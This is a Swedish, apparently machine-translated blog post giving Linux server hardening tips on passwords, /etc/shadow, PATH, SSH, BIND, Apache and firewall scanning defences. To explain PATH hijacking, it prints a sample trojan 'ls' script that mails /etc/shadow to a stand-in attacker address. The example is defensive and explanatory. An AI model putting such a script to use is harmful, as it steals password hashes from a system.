Säkerhetstips för din Linux (server) (del 1)

Jag har inte publicerat något på bloggen på länge och jag skulle vilja dela med dig några råd från en bok som, (bland andra). Jag hittade det vid universitetet och jag läste bara och även om det ärligt talat är lite föråldrat och de visade teknikerna är mycket osannolika att fungera med tanke på systemets utveckling är de också intressanta aspekter som kan visas. 9788448140502

Jag vill klargöra att det här är tips som är inriktade på ett Linux-system som används som server, i medel eller kanske stor skala med tanke på att på skrivbordets användarnivå, även om de kan tillämpas, skulle de inte vara särskilt användbara.

Jag varnar också för att det är enkla snabba tips och jag kommer inte att gå in i detalj, även om jag planerar att göra ett annat mycket mer specifikt och omfattande inlägg om ett visst ämne. Men jag får se det senare. Låt oss börja.

Lösenordspolicyer. 

Även om det låter som ett slagord, gör skillnaden mellan ett sårbart system eller inte med en bra lösenordspolicy. Attacker som "brute force" dra nytta av att ha ett dåligt lösenord för att komma åt ett system. De vanligaste tipsen är:

  • Kombinera versaler och gemener.
  • Använd specialtecken.
  • Tal.
  • Mer än 6 siffror (förhoppningsvis mer än 8).

Utöver detta, låt oss överväga två viktiga filer.  / etc / passwd och / etc / shadow.

Något mycket viktigt är att filen / etc / passwd. Förutom att ge oss namnet på användaren, hans uid, mappsökväg, bash .. etc. i vissa fall visar det också användarens krypterade nyckel.

 Låt oss titta på dess typiska komposition.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

användare: cryptkey: uid: gid: path :: sökväg: bash

Det verkliga problemet här är att den här filen har behörighet -rw-r - r– vilket innebär att den har läsbehörigheter för alla användare i systemet. och att ha den krypterade nyckeln är inte särskilt svårt att dechiffrera den verkliga.

Det är därför filen finns / etc / skugga. Detta är filen där alla användarnycklar lagras bland annat. Den här filen har nödvändiga behörigheter så att ingen användare kan läsa den.

För att åtgärda detta måste vi gå till filen / Etc / passwd och ändra den krypterade nyckeln till ett "x", detta kommer att leda till att nyckeln bara sparas i vår fil / etc / skugga.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Problem med PATH och .bashrc och andra.

När en användare kör ett kommando på sin konsol letar skalet efter det kommandot i en kataloglista som finns i PATH-miljövariabeln.

Om du skriver "echo $ PATH" i konsolen kommer den att mata ut något så här.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Var och en av dessa mappar är där skalet letar efter kommandot skrivet för att utföra det. "." det betyder att den första mappen som ska sökas är samma mapp från vilken kommandot körs.

Antag att det finns en användare "Carlos" och den här användaren vill "göra ont." Den här användaren kan lämna en fil som heter "ls" i sin huvudmapp och i den här filen utföra ett kommando som:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Och om rootanvändaren för saker av destinationen försöker lista mapparna i carlos-mappen (eftersom det först letar efter kommandot i samma mapp, skulle det oavsiktligt skicka filen med lösenorden till det här e-postmeddelandet och sedan mapparna skulle listas och han skulle inte få reda på det förrän mycket sent.

För att undvika det måste vi eliminera "." av PATH-variabeln.

På samma sätt bör filer som /.bashrc, /.bashrc_profile, ./.login granskas och kontrollera att det inte finns något "." i PATH-variabeln och faktiskt från filer som denna kan du ändra destinationen för ett specifikt kommando.

Tips med tjänster:

SHH

  • Inaktivera version 1 av ssh-protokollet i filen sshd_config.
  • Låt inte rotanvändaren logga in med ssh.
  • Filerna och mapparna ssh_host_key, ssh_host_dsa_key och ssh_host_rsa_key bör endast läsas av rotanvändaren.

BINDA

  • Ändra välkomstmeddelandet i den namngivna.conf-filen så att den inte visar versionsnumret
  • Begränsa zonöverföringar och aktivera det bara för lag som behöver det.

Apache

  • Förhindra att tjänsten visar din version i välkomstmeddelandet. Redigera httpd.conf-filen och lägg till eller ändra raderna:  

ServerSignature Off
ServerTokens Prod

  • Inaktivera automatisk indexering
  • Konfigurera apache så att den inte serverar känsliga filer som .htacces, * .inc, * .jsp .. etc.
  • Ta bort man-sidor eller prov från tjänsten
  • Kör apache i en rotad miljö

Nätverkssäkerhet.

Det är viktigt att täcka alla möjliga ingångar till ditt system från det externa nätverket, här är några viktiga tips för att förhindra inkräktare från att skanna och få information från ditt nätverk.

Blockera ICMP-trafik

Brandväggen måste konfigureras för att blockera alla typer av inkommande och utgående ICMP-trafik och ekosvar. Med detta undviker du att till exempel en skanner som letar efter liveutrustning inom ett IP-område hittar dig. 

Undvik TCP-ping-skanning.

Ett sätt att skanna ditt system är TCP-ping-skanning. Anta att det finns en Apache-server på port 80 på din server. Innträngaren kan skicka en ACK-begäran till den porten. Om systemet svarar kommer datorn att leva och skanna resten av portarna.

För detta bör din brandvägg alltid ha alternativet "tillståndsmedvetenhet" och bör kasta alla ACK-paket som inte motsvarar en redan etablerad TCP-anslutning eller session.

Några ytterligare tips:

  • Använd IDS-system för att upptäcka portavsökningar till ditt nätverk.
  • Konfigurera brandväggen så att den inte litar på anslutningskällans portinställningar.

Detta beror på att vissa skanningar använder en "falsk" källport som 20 eller 53, eftersom många system litar på dessa portar eftersom de är typiska för en ftp eller en DNS.

OBS! Kom ihåg att de flesta av problemen som anges i det här inlägget redan har lösts i nästan alla nuvarande distributioner. Men det gör aldrig ont att ha viktig information om dessa problem så att de inte händer dig.

OBS! Senare kommer jag att se ett specifikt ämne och jag kommer att göra ett inlägg med mycket mer detaljerad och aktuell information.

Thaks alla för att läsa.

Hälsningar.


Innehållet i artikeln följer våra principer om redaktionell etik. Klicka på för att rapportera ett fel här.

En kommentar, lämna din

Lämna din kommentar

Din e-postadress kommer inte att publiceras.

*

*

  1. Ansvarig för uppgifterna: Miguel Ángel Gatón
  2. Syftet med uppgifterna: Kontrollera skräppost, kommentarhantering.
  3. Legitimering: Ditt samtycke
  4. Kommunikation av uppgifterna: Uppgifterna kommer inte att kommuniceras till tredje part förutom enligt laglig skyldighet.
  5. Datalagring: databas värd för Occentus Networks (EU)
  6. Rättigheter: När som helst kan du begränsa, återställa och radera din information.

  1.   informatic sade

    Jag gillade verkligen artikeln och jag är intresserad av ämnet, jag uppmuntrar dig att fortsätta ladda upp innehåll.